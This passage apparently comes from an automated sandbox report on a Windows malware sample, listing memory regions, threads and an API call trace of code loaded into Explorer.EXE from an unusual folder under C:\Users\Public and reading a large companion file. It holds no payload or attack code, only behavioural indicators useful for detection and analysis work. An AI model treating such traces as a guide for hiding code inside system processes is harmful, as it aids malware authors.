0x1e20000 end_va = 0x1e21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 843 start_va = 0x6cea0000 end_va = 0x6cea8fff entry_point = 0x6cea21d3 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" Region: id = 846 start_va = 0x1e30000 end_va = 0x1e34fff entry_point = 0x1e30000 region_type = mapped_file name = "ActionCenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" Region: id = 847 start_va = 0x33f0000 end_va = 0x342ffff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 848 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1119 start_va = 0x2080000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1120 start_va = 0x3130000 end_va = 0x316ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 1121 start_va = 0x35b0000 end_va = 0x35effff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 1122 start_va = 0x35f0000 end_va = 0x362ffff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 1123 start_va = 0x6c3f0000 end_va = 0x6c41afff entry_point = 0x6c40d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" Region: id = 1124 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1125 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1126 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 14 os_tid = 0xab8 Thread: id = 15 os_tid = 0x9dc Thread: id = 16 os_tid = 0x9d0 Thread: id = 17 os_tid = 0x9c4 Thread: id = 18 os_tid = 0x9b8 Thread: id = 19 os_tid = 0x9b4 Thread: id = 20 os_tid = 0x988 Thread: id = 21 os_tid = 0x93c Thread: id = 22 os_tid = 0x91c Thread: id = 23 os_tid = 0x914 Thread: id = 24 os_tid = 0x8c8 Thread: id = 25 os_tid = 0x4bc Thread: id = 26 os_tid = 0x6a0 Thread: id = 27 os_tid = 0x678 Thread: id = 28 os_tid = 0x670 Thread: id = 29 os_tid = 0x658 Thread: id = 30 os_tid = 0x654 Thread: id = 31 os_tid = 0x5fc Thread: id = 32 os_tid = 0x5e8 Thread: id = 33 os_tid = 0x5e0 Thread: id = 34 os_tid = 0x5c8 Thread: id = 35 os_tid = 0x5c4 Thread: id = 36 os_tid = 0x5c0 Thread: id = 37 os_tid = 0x5bc Thread: id = 38 os_tid = 0x5b8 Thread: id = 39 os_tid = 0x5ac Thread: id = 40 os_tid = 0x5a8 Thread: id = 41 os_tid = 0x5a4 Thread: id = 42 os_tid = 0x59c Thread: id = 43 os_tid = 0x528 Thread: id = 44 os_tid = 0x524 Thread: id = 45 os_tid = 0x51c Thread: id = 46 os_tid = 0x518 Thread: id = 47 os_tid = 0x514 Thread: id = 48 os_tid = 0x4fc Thread: id = 49 os_tid = 0x4f4 Thread: id = 50 os_tid = 0xc00 [0030.131] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fc4ad0 [0030.131] GetKeyboardType (nTypeFlag=0) returned 4 [0030.132] GetCommandLineA () returned="C:\\Windows\\Explorer.EXE" [0030.132] GetStartupInfoA (in: lpStartupInfo=0x56cf624 | out: lpStartupInfo=0x56cf624*(cb=0x44, lpReserved="C:\\Windows\\Explorer.EXE", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\Explorer.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x409, dwFillAttribute=0x4a0000, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0030.132] GetVersion () returned 0x1db10106 [0030.132] GetVersion () returned 0x1db10106 [0030.132] GetCurrentThreadId () returned 0xc00 [0030.132] GetModuleFileNameA (in: hModule=0x6670000, lpFilename=0x56cf120, nSize=0x105 | out: lpFilename="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned 0x20 [0030.132] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x56ceffb, nSize=0x105 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0030.132] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x56cf110 | out: phkResult=0x56cf110*=0x0) returned 0x2 [0030.132] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x56cf110 | out: phkResult=0x56cf110*=0x0) returned 0x2 [0030.133] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x56cf110 | out: phkResult=0x56cf110*=0x0) returned 0x2 [0030.133] lstrcpynA (in: lpString1=0x56ceffb, lpString2="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E", iMaxLength=261 | out: lpString1="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E" [0030.133] GetThreadLocale () returned 0x409 [0030.133] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x56cf10b, cchData=5 | out: lpLCData="ENU") returned 4 [0030.133] lstrlenA (lpString="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned 32 [0030.133] lstrcpynA (in: lpString1=0x56cf016, lpString2="ENU", iMaxLength=234 | out: lpString1="ENU") returned="ENU" [0030.133] LoadLibraryExA (lpLibFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0030.133] lstrcpynA (in: lpString1=0x56cf016, lpString2="EN", iMaxLength=234 | out: lpString1="EN") returned="EN" [0030.133] LoadLibraryExA (lpLibFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0030.133] LoadStringA (in: hInstance=0x6670000, uID=0xffdf, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0030.133] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x54f3ea8 [0030.133] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x6770000 [0030.133] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x54e7e80 [0030.133] VirtualAlloc (lpAddress=0x6770000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6770000 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffde, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffdc, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffdd, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffd0, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffd8, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffef, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffec, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffd3, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffd2, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffe4, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffe5, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffe6, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffe3, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffe1, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xffff, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xfffe, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xfffd, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xfffc, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0030.134] LoadStringA (in: hInstance=0x6670000, uID=0xfffb, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfffa, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff9, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff8, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff7, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff6, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff5, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff4, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff3, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff2, lpBuffer=0x56cf244, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xfff0, lpBuffer=0x56cf230, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0030.135] LoadStringA (in: hInstance=0x6670000, uID=0xffe0, lpBuffer=0x56cf230, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0030.135] GetVersionExA (in: lpVersionInformation=0x56cf5c8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x56cf674, dwMinorVersion=0x7721e0ed, dwBuildNumber=0x84bfd, dwPlatformId=0xfffffffe, szCSDVersion="<\x9f%w7\x1f\x90u,`\x9cuh\x13L\x05V4g\x06£!g\x06`öl\x05Ð!g\x06\x14öl\x05dHh\x06\x0e") | out: lpVersionInformation=0x56cf5c8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0030.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75900000 [0030.136] GetProcAddress (hModule=0x75900000, lpProcName="GetDiskFreeSpaceExA") returned 0x7598f46f [0030.136] GetThreadLocale () returned 0x409 [0030.136] GetThreadLocale () returned 0x409 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Jan") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="January") returned 8 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Feb") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="February") returned 9 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Mar") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="March") returned 6 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Apr") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="April") returned 6 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="May") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="May") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Jun") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="June") returned 5 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Jul") returned 4 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="July") returned 5 [0030.136] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Aug") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="August") returned 7 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Sep") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="September") returned 10 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Oct") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="October") returned 8 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Nov") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="November") returned 9 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Dec") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="December") returned 9 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Sun") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Sunday") returned 7 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Mon") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Monday") returned 7 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Tue") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Tuesday") returned 8 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Wed") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Wednesday") returned 10 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Thu") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Thursday") returned 9 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Fri") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Friday") returned 7 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Sat") returned 4 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x56cf4a0, cchData=256 | out: lpLCData="Saturday") returned 9 [0030.137] GetThreadLocale () returned 0x409 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="$") returned 2 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="0") returned 2 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="0") returned 2 [0030.137] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x56cf5f4, cchData=2 | out: lpLCData=",") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x56cf5f4, cchData=2 | out: lpLCData=".") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="2") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x56cf5f4, cchData=2 | out: lpLCData="/") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0030.138] GetThreadLocale () returned 0x409 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x56cf4c8, cchData=256 | out: lpLCData="1") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0030.138] GetThreadLocale () returned 0x409 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x56cf4c8, cchData=256 | out: lpLCData="1") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x56cf5f4, cchData=2 | out: lpLCData=":") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="AM") returned 3 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="PM") returned 3 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="0") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="0") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x56cf4fc, cchData=256 | out: lpLCData="0") returned 2 [0030.138] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x56cf5f4, cchData=2 | out: lpLCData=",") returned 2 [0030.139] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76ee0000 [0030.139] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantChangeTypeEx") returned 0x76ee4c28 [0030.139] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNeg") returned 0x76f5c802 [0030.140] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNot") returned 0x76f5ec66 [0030.140] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAdd") returned 0x76f05934 [0030.141] GetProcAddress (hModule=0x76ee0000, lpProcName="VarSub") returned 0x76f5d332 [0030.141] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMul") returned 0x76f5dbd4 [0030.142] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDiv") returned 0x76f5e405 [0030.142] GetProcAddress (hModule=0x76ee0000, lpProcName="VarIdiv") returned 0x76f5f00a [0030.143] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMod") returned 0x76f5f15e [0030.143] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAnd") returned 0x76f05a98 [0030.143] GetProcAddress (hModule=0x76ee0000, lpProcName="VarOr") returned 0x76f5ecfa [0030.144] GetProcAddress (hModule=0x76ee0000, lpProcName="VarXor") returned 0x76f5ee2e [0030.144] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCmp") returned 0x76efb0dc [0030.145] GetProcAddress (hModule=0x76ee0000, lpProcName="VarI4FromStr") returned 0x76ef6fab [0030.145] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR4FromStr") returned 0x76f001a0 [0030.146] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR8FromStr") returned 0x76ef699e [0030.146] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDateFromStr") returned 0x76f06ba7 [0030.147] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCyFromStr") returned 0x76f26c12 [0030.147] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBoolFromStr") returned 0x76efdbd1 [0030.147] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromCy") returned 0x76f07fdc [0030.148] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromDate") returned 0x76ef7a2a [0030.148] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromBool") returned 0x76f00355 [0030.149] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xb0c [0030.149] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb08 [0030.149] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb14 [0030.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x66847f4, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x6686884 | out: lpThreadId=0x6686884*=0xc04) returned 0xb28 [0030.150] LocalFree (hMem=0x2fc4ad0) returned 0x0 Thread: id = 51 os_tid = 0xc04 [0030.151] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fc4c20 [0030.151] GetComputerNameA (in: lpBuffer=0x68ffa78, nSize=0x68ffa74 | out: lpBuffer="N3EERVTWSM", nSize=0x68ffa74) returned 1 [0030.151] CreateFileA (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E" (normalized: "c:\\users\\public\\n3eg\\n3eg1.51n3e"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb10 [0030.151] SetFilePointer (in: hFile=0xb10, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ffa30*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x68ffa30*=0) returned 0x0 [0030.151] SetFilePointer (in: hFile=0xb10, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ffa28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x68ffa28*=0) returned 0x0 [0030.151] SetFilePointer (in: hFile=0xb10, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ffa28*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x68ffa28*=0) returned 0x290a01 [0030.151] SetFilePointer (in: hFile=0xb10, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ffa28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x68ffa28*=0) returned 0x0 [0030.152] GlobalLock (hMem=0xb4008c) returned 0x6900020 [0030.152] ReadFile (in: hFile=0xb10, lpBuffer=0x6900020, nNumberOfBytesToRead=0x290a01, lpNumberOfBytesRead=0x68ffa44, lpOverlapped=0x0 | out: lpBuffer=0x6900020*, lpNumberOfBytesRead=0x68ffa44*=0x290a01, lpOverlapped=0x0) returned 1 [0030.235] CloseHandle (hObject=0xb10) returned 1 [0030.314] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.314] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.314] GlobalUnlock (hMem=0xb40084) returned 0 [0030.314] GlobalReAlloc (hMem=0xb40084, dwBytes=0x4000, uFlags=0x2) returned 0xb40084 [0030.314] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.315] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.315] GlobalUnlock (hMem=0xb40084) returned 0 [0030.315] GlobalReAlloc (hMem=0xb40084, dwBytes=0x6000, uFlags=0x2) returned 0xb40084 [0030.315] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.315] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.315] GlobalUnlock (hMem=0xb40084) returned 0 [0030.315] GlobalReAlloc (hMem=0xb40084, dwBytes=0x8000, uFlags=0x2) returned 0xb40084 [0030.315] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.316] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.316] GlobalUnlock (hMem=0xb40084) returned 0 [0030.316] GlobalReAlloc (hMem=0xb40084, dwBytes=0xa000, uFlags=0x2) returned 0xb40084 [0030.316] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.317] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.317] GlobalUnlock (hMem=0xb40084) returned 0 [0030.317] GlobalReAlloc (hMem=0xb40084, dwBytes=0xc000, uFlags=0x2) returned 0xb40084 [0030.317] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.317] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.317] GlobalUnlock (hMem=0xb40084) returned 0 [0030.317] GlobalReAlloc (hMem=0xb40084, dwBytes=0xe000, uFlags=0x2) returned 0xb40084 [0030.317] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.318] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.318] GlobalUnlock (hMem=0xb40084) returned 0 [0030.318] GlobalReAlloc (hMem=0xb40084, dwBytes=0x10000, uFlags=0x2) returned 0xb40084 [0030.318] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.319] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.319] GlobalUnlock (hMem=0xb40084) returned 0 [0030.319] GlobalReAlloc (hMem=0xb40084, dwBytes=0x12000, uFlags=0x2) returned 0xb40084 [0030.319] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.320] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.320] GlobalUnlock (hMem=0xb40084) returned 0 [0030.320] GlobalReAlloc (hMem=0xb40084, dwBytes=0x14000, uFlags=0x2) returned 0xb40084 [0030.321] GlobalLock (hMem=0xb40084) returned 0x5506eb8 [0030.321] GlobalHandle (pMem=0x5506eb8) returned 0xb40084 [0030.321] GlobalUnlock (hMem=0xb40084) returned 0 [0030.321] GlobalReAlloc (hMem=0xb40084, dwBytes=0x16000, uFlags=0x2) returned 0xb40084 [0030.322] GlobalLock (hMem=0xb40084) returned 0x551aec8 [0030.323] GlobalHandle (pMem=0x551aec8) returned 0xb40084 [0030.323] GlobalUnlock (hMem=0xb40084) returned 0 [0030.323] GlobalReAlloc (hMem=0xb40084, dwBytes=0x18000, uFlags=0x2) returned 0xb40084 [0030.323] GlobalLock (hMem=0xb40084) returned 0x551aec8 [0030.324] GlobalHandle (pMem=0x551aec8) returned 